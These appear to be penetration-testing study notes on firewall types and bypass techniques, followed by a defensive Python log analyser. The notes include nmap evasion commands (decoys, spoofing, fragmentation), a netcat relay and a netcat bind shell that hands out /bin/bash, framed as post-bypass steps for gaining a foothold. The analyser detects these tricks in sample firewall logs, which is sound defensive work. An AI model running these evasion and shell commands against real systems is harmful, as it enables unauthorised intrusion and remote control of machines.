# Firewall Handling and Bypassing

## Types

* Packet filtering
* Circuit level gateway
* Stateful inspection
* Proxy
* Next generation firewall
* Cloud firewall and FWaaS

## Rules

* Firewalls follow rule sets configured like in the examples below.

### Windows

```sh
netsh advfirewall firewall add rule name="muka" dir=in action=allow protocol=tcp localport=57869
```

### Linux

```sh
firewall-cmd --zone=public --add-port=57869/tcp
```

## Bypassing Firewalls

* IP/MAC/Port spoofing
* Fragmentation, MTU, data length
* Header modification

### nmap

* nmap contains multiple measures which can be used to circumvent firewalls securing the target we want to connect to.

#### Spoofing

* __Decoy__ `-D`, mixes our own IP address (`ME`) with the given or random (`RND`) decoy addresses. Every port is probed from each of these addresses, so the real scanner is hidden among the decoys.

```sh
sudo nmap -Pn -D 192.168.0.23,192.168.0.42,ME -F $TARGET_IP
sudo nmap -Pn -D RND,RND,ME -F $TARGET_IP
```

* __Proxy__

```sh
sudo nmap -Pn -F --proxies $PROXY_IP $TARGET_IP
```

* __Spoofed MAC__

```sh
sudo nmap -Pn -F --spoof-mac $MAC_ADDRESS $TARGET_IP
```

* __Spoofed IP__

```sh
sudo nmap -Pn -F -S $ATTACKER_IP $TARGET_IP
```

* __Port Number__, select a source port which is whitelisted.
  Frequently this is 53, 80 or 443.

```sh
sudo nmap -F --source-port 443 $TARGET_IP
```

* __Fragmentation__, splits each probe into tiny IP fragments: 8 bytes of data after the 20-byte IP header via `-f`, or 16 bytes via `-ff`.

```sh
sudo nmap -Pn -F -f $TARGET_IP
```

* __MTU__, works like fragmentation with an explicit fragment size; `-f` == `--mtu 8`.

```sh
sudo nmap -Pn -F --mtu 8 $TARGET_IP
```

* __Data Length__, appends the given number of random padding bytes to each probe packet (on top of the Ethernet and IP headers).

```sh
sudo nmap -Pn -F --data-length 64 $TARGET_IP
```

#### Header Fields

* __TTL__

```sh
sudo nmap -Pn -F --ttl 64 $TARGET_IP
```

* __IP Options__, `--ip-options` takes the options either as a hex string or as one of these shortcuts
  * Record route, `R`
  * Timestamp, `T`
  * Route + timestamp, `U`
  * Loose source routing, `L $IP $IP $IP`
  * Strict source routing, `S $IP $IP $IP`
* __Checksum__, craft packets with a bad checksum via `--badsum` to check how the firewall handles errors

```sh
sudo nmap -Pn -F --badsum $TARGET_IP
```

#### Post FW

After the firewall has been bypassed there are further possible steps to gain a foothold. One of them is to open a bind shell on standard ports which are usually not covered by firewall configurations, like 443 or 80.

* __Hopping__, listen via netcat to catch that port
* __Tunneling__, open a relay after passing the firewall to connect to the closed port

```sh
nc -lvnp 443 --sh-exec "nc $TARGET_IP 25"
```

* __Non standard ports__, open a bind shell via

```sh
nc -lvnp 8888 -e /bin/bash
```

and connect.
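Every evasion option listed above leaves a trace in the firewall's own logs, which is what a defender should be watching for. The following Python script is an added example, not part of the original notes: it parses constructed iptables-style `LOG` lines and flags a port scan (one source touching many ports), a decoy scan (several sources probing exactly the same port set, as `-D` produces), a bare SYN arriving from a "trusted" source port such as 53/80/443 (the `--source-port` trick; a real reply from those ports would be a SYN-ACK), and IP fragments (`-f`, `--mtu`). The log line format, the threshold of ten ports and all addresses are assumptions made for the sample data.

```python
import re
from collections import defaultdict

# Minimal parser for iptables-style LOG lines (exact field layout is an assumption).
FIELD_RE = re.compile(r"SRC=(?P<src>\S+) DST=(?P<dst>\S+) .*?PROTO=(?P<proto>\S+)")
PORT_RE = re.compile(r"SPT=(?P<spt>\d+) DPT=(?P<dpt>\d+)")

TRUSTED_SOURCE_PORTS = {53, 80, 443}   # ports naive "allow by source port" rules trust
SCAN_THRESHOLD = 10                     # distinct destination ports from one source


def parse_line(line):
    """Return the fields needed for detection, or None for lines that are not LOG entries."""
    m = FIELD_RE.search(line)
    if not m:
        return None
    rec = {"src": m["src"], "dst": m["dst"], "proto": m["proto"], "spt": None, "dpt": None}
    p = PORT_RE.search(line)
    if p:
        rec["spt"], rec["dpt"] = int(p["spt"]), int(p["dpt"])
    words = set(line.split())
    # "MF" marks a first fragment with more to follow; "FRAG:<offset>" a later fragment.
    rec["frag"] = "MF" in words or any(w.startswith("FRAG:") for w in words)
    # A bare SYN (no ACK) is a new connection attempt, never a reply from a server.
    rec["new_conn"] = "SYN" in words and "ACK" not in words
    return rec


def analyze(lines):
    """Run all detections over an iterable of log lines and return a list of findings."""
    ports_by_src = defaultdict(set)
    frags_by_src = defaultdict(int)
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["frag"]:
            frags_by_src[rec["src"]] += 1
        if rec["dpt"] is None:          # later fragments carry no TCP/UDP header
            continue
        ports_by_src[rec["src"]].add(rec["dpt"])
        if rec["new_conn"] and rec["spt"] in TRUSTED_SOURCE_PORTS:
            findings.append(("source_port_abuse", rec["src"], rec["spt"], rec["dpt"]))
    # Port scan: one source touching many distinct destination ports.
    scanners = {s for s, ports in ports_by_src.items() if len(ports) >= SCAN_THRESHOLD}
    for s in sorted(scanners):
        findings.append(("port_scan", s, len(ports_by_src[s])))
    # Decoys: several scanning sources probing exactly the same port set.
    by_portset = defaultdict(list)
    for s in scanners:
        by_portset[frozenset(ports_by_src[s])].append(s)
    for ports, sources in by_portset.items():
        if len(sources) > 1:
            findings.append(("decoy_group", tuple(sorted(sources)), len(ports)))
    for s, n in sorted(frags_by_src.items()):
        findings.append(("fragments", s, n))
    return findings


def _log(src, dst, spt, dpt, flags="SYN"):
    """Build one constructed iptables-style log line (sample data, not real traffic)."""
    return (f"kernel: FW-DROP IN=eth0 OUT= SRC={src} DST={dst} LEN=44 TOS=0x00 "
            f"PREC=0x00 TTL=64 ID=1 PROTO=TCP SPT={spt} DPT={dpt} "
            f"WINDOW=1024 RES=0x00 {flags} URGP=0")


SAMPLE_PORTS = [21, 22, 23, 25, 53, 80, 110, 139, 143, 443, 445, 3389]
SAMPLE_LOG = (
    # three sources hitting the identical port list: what a decoy scan (-D) looks like
    [_log(src, "10.0.0.1", 40000 + i, p)
     for src in ("192.168.0.23", "192.168.0.42", "192.168.0.77")
     for i, p in enumerate(SAMPLE_PORTS)]
    # a bare SYN from source port 443 to ssh: the --source-port trick
    + [_log("10.0.0.9", "10.0.0.1", 443, 22)]
    # one probe split into fragments: the first carries MF, the second FRAG:8 and no ports
    + ["kernel: FW-DROP IN=eth0 OUT= SRC=10.0.0.7 DST=10.0.0.1 LEN=28 TOS=0x00 PREC=0x00 "
       "TTL=64 ID=7 MF PROTO=TCP SPT=40001 DPT=80 WINDOW=1024 RES=0x00 SYN URGP=0",
       "kernel: FW-DROP IN=eth0 OUT= SRC=10.0.0.7 DST=10.0.0.1 LEN=28 TOS=0x00 PREC=0x00 "
       "TTL=64 ID=7 FRAG:8 PROTO=TCP"]
    # an ordinary client connecting to the web server: produces no finding
    + [_log("172.16.1.4", "10.0.0.1", 51234, 443)]
)

if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(*finding)
```

The decoy check deliberately runs only over sources that already qualify as scanners: that is what separates a decoy group from two unrelated clients that happen to hit the same couple of ports. Fragments are counted separately because later fragments carry no transport header, so the port-based checks cannot see them at all; a firewall that reassembles before filtering, or simply drops fragments, removes that blind spot.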